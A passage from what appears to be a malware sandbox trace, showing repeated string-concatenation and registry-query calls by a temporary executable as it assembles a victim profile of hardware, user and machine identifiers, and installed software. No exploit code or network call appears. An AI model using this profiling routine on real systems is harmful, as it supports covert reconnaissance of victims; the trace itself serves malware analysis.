C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Office OSM UX MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016" [0175.941] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.941] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 " [0175.941] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001" [0175.941] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 